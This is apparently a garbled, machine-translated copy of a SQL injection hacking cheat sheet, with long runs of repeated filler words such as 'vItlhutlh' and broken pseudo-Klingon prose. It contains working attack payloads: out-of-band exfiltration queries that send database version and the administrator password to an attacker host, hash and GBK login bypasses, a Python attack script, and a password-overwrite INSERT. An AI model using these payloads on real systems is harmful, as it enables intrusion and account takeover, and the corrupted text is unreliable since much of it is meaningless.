**vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **vItlhutlh** **
```sql
select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));
```
### Out of band data exfiltration via XXE

#### Description

XXE (XML External Entity) injection is a vulnerability that allows an attacker to read arbitrary files on the server or perform server-side request forgery (SSRF) attacks. In some cases, it is also possible to exfiltrate data from the server using XXE.

#### How it works

1. The attacker identifies a vulnerable parameter that accepts XML input.
2. The attacker crafts a malicious XML payload that includes an external entity reference pointing to a file on the server.
3. The attacker submits the payload to the vulnerable parameter.
4. If the server is vulnerable to XXE, it will process the XML payload and attempt to resolve the external entity reference.
5. The server will then send a request to the specified file on behalf of the attacker.
6. The attacker can monitor the server's response to exfiltrate sensitive data.

#### Out of band data exfiltration

In some cases, the attacker may not receive the server's response directly. This can happen if the server is behind a firewall or if the attacker's IP address is blocked. However, the attacker can still exfiltrate data using out of band (OOB) techniques.

##### OOB techniques

1. DNS exfiltration: The attacker crafts a payload that causes the server to make DNS requests to a domain under the attacker's control. By monitoring the DNS server logs, the attacker can extract the exfiltrated data.

2. HTTP exfiltration: The attacker crafts a payload that causes the server to make HTTP requests to a web server under the attacker's control. The attacker can then analyze the web server logs to extract the exfiltrated data.

3. FTP exfiltration: The attacker crafts a payload that causes the server to make FTP requests to an FTP server under the attacker's control. The attacker can then analyze the FTP server logs to extract the exfiltrated data.

#### Prevention

To prevent XXE vulnerabilities, follow these best practices:

- Use a secure XML parser that disables external entity resolution by default.
- If external entity resolution is required, use a whitelist of trusted entities.
- Validate and sanitize all user input before processing it as XML.
- Implement proper input validation and output encoding to prevent other types of injection attacks.
- Keep all software and libraries up to date to avoid known XXE vulnerabilities.

#### References

- [OWASP XXE Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)
- [PortSwigger XXE Cheat Sheet](https://portswigger.net/web-security/xxe)
- [OWASP Testing Guide - XXE](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/14-Testing_for_XML_External_Entity_(XXE)_Injection)
```sql
a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.hacker.site/"> %remote;]>'),'/l') FROM dual-- -
```
## qo'noS

Check the [SQLMap Cheetsheat](sqlmap/) to exploit a SQLi vulnerability with [**sqlmap**](https://github.com/sqlmapproject/sqlmap).

## Tech specific info

We have already discussed all the ways to exploit a SQL Injection vulnerability. Find some more tricks database technology dependant in this book:

* [MS Access](ms-access-sql-injection.md)
* [MSSQL](mssql-injection.md)
* [MySQL](mysql-injection/)
* [Oracle](oracle-injection.md)
* [PostgreSQL](postgresql-injection/)

Or you will find **a lot of tricks regarding: MySQL, PostgreSQL, Oracle, MSSQL, SQLite and HQL in** [**https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection**](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)


<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>

[**RootedCON**](https://www.rootedcon.com/) is the most relevant cybersecurity event in **Spain** and one of the most important in **Europe**. With **the mission of promoting technical knowledge**, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.

{% embed url="https://www.rootedcon.com/" %}

## Authentication bypass

List to try to bypass the login functionality:

{% content-ref url="../login-bypass/sql-login-bypass.md" %}
[sql-login-bypass.md](../login-bypass/sql-login-bypass.md)
{% endcontent-ref %}

### Raw hash authentication Bypass
```sql
"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
```
**tlhIngan Hol Translation:**

**This query showcases a vulnerability when MD5 is used with true for raw output in authentication checks, making the system susceptible to SQL injection. Attackers can exploit this by crafting inputs that, when hashed, produce unexpected SQL command parts, leading to unauthorized access.**

**QapHa'logh:**

**QapHa'logh vItlhutlh MD5 vItlhutlh true raw output authentication checks, vItlhutlh system susceptible SQL injection. QapHa'logh vItlhutlh attackers can exploit vItlhutlh crafting inputs, vaj hashed, produce unexpected SQL command parts, leading vItlhutlh unauthorized access.**
```sql
md5("ffifdyop", true) = 'or'6<EFBFBD>]<EFBFBD><EFBFBD>!r,<EFBFBD><EFBFBD>b<EFBFBD>
sha1("3fDf ", true) = Q<EFBFBD>u'='<EFBFBD>@<EFBFBD>[<EFBFBD>t<EFBFBD>- o<EFBFBD><EFBFBD>_-!
```
### Injected hash authentication Bypass

#### Description

This technique involves bypassing authentication by injecting a specially crafted hash value into the authentication process. By manipulating the hash value, an attacker can trick the system into granting unauthorized access.

#### Vulnerability

This technique relies on a vulnerability in the authentication mechanism that allows the injection of arbitrary hash values. This vulnerability can occur when the system does not properly validate or sanitize user input before using it to generate or compare hash values.

#### Exploitation

To exploit this vulnerability, an attacker needs to identify the input field or parameter that is used to generate the hash value for authentication. Once identified, the attacker can manipulate the input to generate a hash value that will bypass the authentication process.

#### Mitigation

To mitigate this vulnerability, it is important to implement proper input validation and sanitization techniques. Additionally, using strong and secure hashing algorithms can make it more difficult for attackers to generate valid hash values.

#### Example

Consider a web application that uses a username and password for authentication. The application generates a hash value using the password and compares it with the stored hash value for the user. If the hash values match, the user is granted access.

An attacker can exploit this vulnerability by injecting a specially crafted hash value that matches the stored hash value for a different user. This can be done by manipulating the input field used to generate the hash value.

For example, if the application uses the following SQL query to authenticate users:

```sql
SELECT * FROM users WHERE username = 'input_username' AND password = MD5('input_password')
```

An attacker can inject a hash value that matches the stored hash value for a different user by manipulating the input as follows:

```
input_username: ' OR 1=1 --
input_password: anything
```

This will result in the following SQL query:

```sql
SELECT * FROM users WHERE username = '' OR 1=1 --' AND password = MD5('anything')
```

Since the condition `1=1` is always true, the attacker will be granted access to the application without providing a valid password.
```sql
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
```
**ghItlh list**:

tlhIngan Hol vItlhutlh username vItlhutlh je each line 'ej password vItlhutlh: _**Pass1234.**_\
_(This payloads are also included in the big list mentioned at the beginning of this section)_

{% file src="../../.gitbook/assets/sqli-hashbypass.txt" %}

### GBK Authentication Bypass

' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e' 'e
```sql
%A8%27 OR 1=1;-- 2
%8C%A8%27 OR 1=1-- 2
%bf' or 1=1 -- --
```
Python script:
```python
import requests
url = "http://example.com/index.php"
cookies = dict(PHPSESSID='4j37giooed20ibi12f3dqjfbkp3')
datas = {"login": chr(0xbf) + chr(0x27) + "OR 1=1 #", "password":"test"}
r = requests.post(url, data = datas, cookies=cookies, headers={'referrer':url})
print r.text
```
### Polyglot injection (multicontext)

#### tlhIngan Hol Translation:

### Polyglot injection (multicontext)

#### HTML Translation:

<h3>Polyglot injection (multicontext)</h3>
```sql
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
```
## Insert Statement

### Modify password of existing object/user

To do so you should try to **create a new object named as the "master object"** (probably **admin** in case of users) modifying something:

* Create user named: **AdMIn** (uppercase & lowercase letters)
* Create a user named: **admin=**
* **SQL Truncation Attack** (when there is some kind of **length limit** in the username or email) --> Create user with name: **admin \[a lot of spaces] a**

#### SQL Truncation Attack

If the database is vulnerable and the max number of chars for username is for example 30 and you want to impersonate the user **admin**, try to create a username called: "_admin \[30 spaces] a_" and any password.

The database will **check** if the introduced **username** **exists** inside the database. If **not**, it will **cut** the **username** to the **max allowed number of characters** (in this case to: "_admin \[25 spaces]_") and the it will **automatically remove all the spaces at the end updating** inside the database the user "**admin**" with the **new password** (some error could appear but it doesn't means that this hasn't worked).

More info: [https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html](https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html) & [https://resources.infosecinstitute.com/sql-truncation-attack/#gref](https://resources.infosecinstitute.com/sql-truncation-attack/#gref)

_Note: This attack will no longer work as described above in latest MySQL installations. While comparisons still ignore trailing whitespace by default, attempting to insert a string that is longer than the length of a field will result in an error, and the insertion will fail. For more information about about this check: [https://heinosass.gitbook.io/leet-sheet/web-app-hacking/exploitation/interesting-outdated-attacks/sql-truncation](https://heinosass.gitbook.io/leet-sheet/web-app-hacking/exploitation/interesting-outdated-attacks/sql-truncation)_

### MySQL Insert time based checking

Add as much `','',''` as you consider to exit the VALUES statement. If delay is executed, you have a SQLInjection.
```sql
name=','');WAITFOR%20DELAY%20'0:0:5'--%20-
```
### ON DUPLICATE KEY UPDATE

`ON DUPLICATE KEY UPDATE` laH MySQL Daq yuQjIjDI' 'e' vItlhutlh vItlhutlh UNIQUE index PRIMARY KEY vItlhutlh 'ej vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh
```sql
INSERT INTO users (email, password) VALUES ("generic_user@example.com", "bcrypt_hash_of_newpassword"), ("admin_generic@example.com", "bcrypt_hash_of_newpassword") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_newpassword" -- ";
```
### Qapla'!

- The query attempts to insert two rows: one for `generic_user@example.com` and another for `admin_generic@example.com`.
- If the row for `admin_generic@example.com` already exists, the `ON DUPLICATE KEY UPDATE` clause triggers, instructing MySQL to update the `password` field of the existing row to "bcrypt_hash_of_newpassword".
- Consequently, authentication can then be attempted using `admin_generic@example.com` with the password corresponding to the bcrypt hash ("bcrypt_hash_of_newpassword" represents the new password's bcrypt hash, which should be replaced with the actual hash of the desired password).

### QaD

#### cha'logh 2 accounts vItlhutlh

vaj username, password je email vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh vItlhutlh 